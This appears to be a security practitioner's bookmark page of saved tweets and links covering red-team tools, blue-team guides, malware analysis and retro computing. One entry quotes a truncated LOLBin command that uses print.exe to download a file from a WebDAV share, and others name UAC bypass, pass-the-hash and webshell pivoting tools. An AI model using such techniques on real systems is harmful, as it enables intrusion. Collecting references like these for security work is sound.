Twitter
RT : Efail is a prime example of irresponsible disclosure. There is no responsibility in hyping the story to and ma…
from twitter_favs
8 days ago
Twitter
Excellent use of windows built-in commands to send data out via DNS!
from twitter_favs
12 days ago
Twitter
New 1-page cheat sheet is out! Writing tips for IT pros, based on my experiences writing as a consultant, author, i…
from twitter_favs
12 days ago
Twitter
RT : Passing the hash with native RDP client (mstsc.exe)

infosec  pentest  from twitter_favs
15 days ago
Our Approach to Employee Security Training | PagerDuty
Interesting insights into security awareness trainings at PagerDuty:
from twitter
16 days ago
Twitter
RT : Heathrow departure board operators, you have excelled yourselves...
StarWarsDay  MayThe4thBeWithYou  from twitter
18 days ago
Untitled (https://www.youtube.com/watch?v=KvSZleOozLU&feature=youtu.be)
How to evaluate security solutions? and I shared our perspectives during this episode:
from twitter_favs
22 days ago
Twitter
WinPwnage : A Collection of Python Scripts for UAC Bypass,Privilege Escalation, Dll Hijack and Many More Techniques…
from twitter_favs
22 days ago
Twitter
RT : Because it is so complicated to test if v1, v2 or v3 is active I've released in open source the smb scanner of…
SMB  from twitter_favs
23 days ago
Twitter
I vote for the newsletter. It's much easier to skip things that are not of interest, I don't need e…
from twitter
25 days ago
(403) http://blog.secu.dk/blog/Tunnels_in_a_hard_filtered_network/
Pivoting through HTTP webshells with Tunna: SOCKS proxy webshells (ASP, PHP & JSP)
redteam  from twitter_favs
4 weeks ago
Twitter
Pivoting through HTTP webshells with Tunna: SOCKS proxy webshells (ASP, PHP & JSP)
redteam  from twitter_favs
4 weeks ago
Twitter
One more thought: map the to rules online in same window. Its live, its free and you can now wr…
Sigma  from twitter_favs
4 weeks ago
Twitter
BREAKING: The day has come! My text adventure 1 - This Place is Death, the first…
C64  Hibernated  from twitter_favs
4 weeks ago
GitHub - gpoguy/GetVulnerableGPO: PowerShell script to find 'vulnerable' security-related GPOs that should be hardended
GetVulnerableGPO. PowerShell script to find 'vulnerable' security-related GPOs that should be hardended
from twitter_favs
4 weeks ago
It's time to rebuild the web - O'Reilly Media
Very interesting read: "It's time to rebuild the web" by Mike Loukides
from twitter
5 weeks ago
(404) https://t.co/l9KgmGobTq%5Cfo
RT : This little can download files from webdav:

print /D:c:\outfolder\outfile.exe \\…
LOLBin  from twitter
5 weeks ago
Twitter
RT : This little can download files from webdav:

print /D:c:\outfolder\outfile.exe \\…
LOLBin  from twitter
5 weeks ago
Kilobytemagazine2018 1 by KilobyteMagazine - issuu
Issue 1/2018 is here. Download it for free and spread the word, please.
Find it at issuu:

O…
from twitter_favs
5 weeks ago
Twitter
Issue 1/2018 is here. Download it for free and spread the word, please.
Find it at issuu:

O…
from twitter_favs
5 weeks ago
Hexacorn | Blog
How to become the best Malware Analyst E-V-E-R feedback welcome cc
malware  dfir  from twitter_favs
5 weeks ago
Painless Cuckoo Sandbox Installation | NVISO LABS – blog
Blue teamers, don’t forget your Cuckoo Sandbox or... did I mean red team? Anyhow, still dec…
from twitter_favs
5 weeks ago
Twitter
Blue teamers, don’t forget your Cuckoo Sandbox or... did I mean red team? Anyhow, still dec…
from twitter_favs
5 weeks ago
Twitter
RT : Exfiltrating data via power lines. Very interesting and cool covert channel. Bypasses air-gaps. 1000b/s.…
from twitter
5 weeks ago
Twitter
Not allowed to use copy.exe?
Use print.exe instead. Can also be used to add data to alternate data streams.…
from twitter_favs
5 weeks ago
Reflecting upon OWASP TOP-10 IoT Vulnerabilities – Embedi
RT : Extremely cool write up on examples of IoT vulnerabilities as they relate to the OWASP IoT Top 10.
infosec  iot  from twitter
5 weeks ago
Twitter
Knowing Little Snitch from my Mac past, this sounds promising.
from twitter
5 weeks ago
GitHub - dbohdan/structured-text-tools: A list of command line tools for manipulating structured text data
Life is not only about doing cool stuff. Here's a list of command line tools for manipulating structured text data:
from twitter
6 weeks ago
Qubes OS 4.0 has been released! | Qubes OS
As soon as I find the time, I really need to check out the new 4.0 release of . It…
from twitter
6 weeks ago
Twitter
As soon as I find the time, I really need to check out the new 4.0 release of . It…
from twitter
6 weeks ago
Twitter
RT : Blue Team fundamentals Part Two: Windows Processes
by (in Mar 2017)
from twitter_favs
6 weeks ago
Blue Team fundamentals Part Two: Windows Processes.
RT : Blue Team fundamentals Part Two: Windows Processes
by (in Mar 2017)
from twitter_favs
6 weeks ago
Twitter
RT : Just put up a Big Update to the Commodore 8-Bit Buyer's Guide. Now 25% more products, projects and kits.…
8bitbuyer  from twitter_favs
6 weeks ago
A Shodan Tutorial and Primer
This isn't a great Shodan tutorial, but it's one of the only ones.

infosec  from twitter_favs
6 weeks ago
Twitter
RT : MUCH-AWAITED UPDATE HERE
Watch filtered IOCs with lots of useful information like hashes, C2 requests, dropped exec…
from twitter_favs
7 weeks ago
Incident Response
Good incident response playbook example:
from twitter
7 weeks ago
Announcing 1.1.1.1: the fastest, privacy-first consumer DNS service
RT : Announcing 1.1.1.1: the fastest, privacy-first consumer DNS service -
from twitter_favs
7 weeks ago
Twitter
RT : Announcing 1.1.1.1: the fastest, privacy-first consumer DNS service -
from twitter_favs
7 weeks ago
Twitter
RT : Get Domain Admins (GDA). script to locate systems running processes with a Domain Admin account so that pentesters…
from twitter_favs
7 weeks ago
Untitled (http://LetMeOutOfYour.Net)
RT : is back online. It's an egress testing tool that you can hit via UDP, HTTP, HTTPS, or SSH o…
from twitter_favs
7 weeks ago
Twitter
RT : is back online. It's an egress testing tool that you can hit via UDP, HTTP, HTTPS, or SSH o…
from twitter_favs
7 weeks ago
Twitter
RT : Our team just released , an open-source distributed YARA scanner to help researchers hunt advanced…
GReAT  KLARA  from twitter_favs
7 weeks ago
Twitter
You collect TBs of log data in your and don't know what to search for?
You want to do more than pie charts fo…
SIEM  from twitter_favs
9 weeks ago
Twitter
RT : Please tell me AV are not autodeleting logs. 🤭
from twitter
10 weeks ago
Twitter
Working on a pretty cool "The Bug Hunter's Methodology" Mindmap for you all this weekend =) Stay tuned!
from twitter_favs
10 weeks ago
Twitter
RT : Look at this; it's almost a match made in heaven, or at least, a heavenly match
computers  zx80  from twitter
10 weeks ago
Twitter
RT : Passwords in Terminals:
from twitter
10 weeks ago
Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition)
Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition)
from twitter_favs
10 weeks ago
Twitter
RT : Updated ADSecurity posts w/ event IDs to focus on when enabling logging & why they matter.
Securing Windows Worksta…
from twitter_favs
10 weeks ago
ANY.RUN
RT : - An Interactive Malware Analysis Tool - Is Now Open To The Public - by
from twitter_favs
10 weeks ago
Twitter
RT : Windows 10 deletes all event logs during version update (confirmed with 15063 and 16299). So don’t expect to get m…
from twitter
11 weeks ago
Twitter
> 10+ TB searchable catalog of strings / byte sequences
> tests strings to improve YARA sig…
from twitter_favs
february 2018
malware.one LOGIN
> 10+ TB searchable catalog of strings / byte sequences
> tests strings to improve YARA sig…
from twitter_favs
february 2018
« earlier      
175 ad adblocker admin algorithm analysis api architecture archive arm atm attackercommunity audit auditing av awesome bluehatil brute business bypass cheat cleartext collection concept credentials cryptolocker cyberprobe debian decrypt deobfuscation derivative design device devops dfir dfirsummit directory directx dma docx domain dump encryption esxi excel exploit extract flip force forensic forensics freiesoftware fsrm funny gateway go golang google gpo graylog guard hardening hash honeypot html htop identify inception incident infosec itsecurity keepass kernel laptop linux linux-kernel lisa16 local lynis malware mangle mcafee metasploit mikrotik mimikatz nagios nessus netsh nmap nut onion online openbsd openvpn os paper pass password payload pcap pdf pentest pf pivoting postexploitation powershell privesc processes programming pth ransomware raspberry rce rdp redteam reports routing runbook security seenabledelegationprivilege selfhosted selinux sheet siem skimmers snort ssh ssl stick sysmon teleconsole thunderbolt tool toolkit tools top tor trace tutorial uac unix updates ups usb usv validate vb visualbasic vmm vuln vulnerability wifi wiki windows word zeroday

Copy this bookmark:



description:


tags: